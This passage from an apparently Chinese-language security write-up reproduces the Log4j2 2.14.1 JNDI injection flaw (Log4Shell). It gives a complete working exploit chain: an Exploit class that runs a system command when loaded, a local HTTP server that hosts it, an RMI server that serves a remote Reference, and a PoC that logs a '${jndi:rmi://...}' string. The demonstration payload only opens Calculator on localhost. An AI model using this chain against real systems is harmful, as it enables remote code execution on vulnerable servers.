本篇文章主要分析Log4j2的JNDI注入产生原因,并不会对JNDI注入自身太过关注,网上也有大量分析的文章可供参考,这里就不再详述了。
二、 漏洞复现
=======
以下复现使用Log4j2-2.14.1版本,maven的引用依赖参考如下:
org.apache.logging.log4j
log4j-core
2.14.1
org.apache.logging.log4j
log4j-api
2.14.1
- 编写漏洞利用代码Exploit并编译生成Exploit.class。代码如下:
public class Exploit {
static {
String cmd = “/Applications/Calculator.app/Contents/MacOS/Calculator”;
final Process process;
try {
process = Runtime.getRuntime().exec(cmd);
process.waitFor();
} catch (Exception e) {
e.printStackTrace();
}
}
}
-
本地执行 python3 -m http.server 8081 ,启动web服务器,监听在8081端口。将上一步编译生成的Exploit.class文件放到web服务的根目录(根目录即为执行 python3 -m http.server 8081 命令的工作目录)。
-
编写RMI服务端代码RMIServer,并编译运行。代码如下:
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class RMIServer {
public static void main(String args[]) throws Exception {
Registry registry = LocateRegistry.createRegistry(1099);
Reference exploit = new Reference(“Exploit”, “Exploit”, “http://127.0.0.1:8081/”);
ReferenceWrapper exploitWrapper = new ReferenceWrapper(exploit);
registry.bind(“exp”, exploitWrapper);
}
}
- 编写漏洞poc代码,并编译运行。代码和运行结果如下:
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Log4j2RCEPoc {
public static final Logger LOGGER = LogManager.getLogger(Log4j2RCEPoc.class);
public static void main(String[] args) {
LOGGER.error(“${jndi:rmi://127.0.0.1:1099/exp}”);
}
}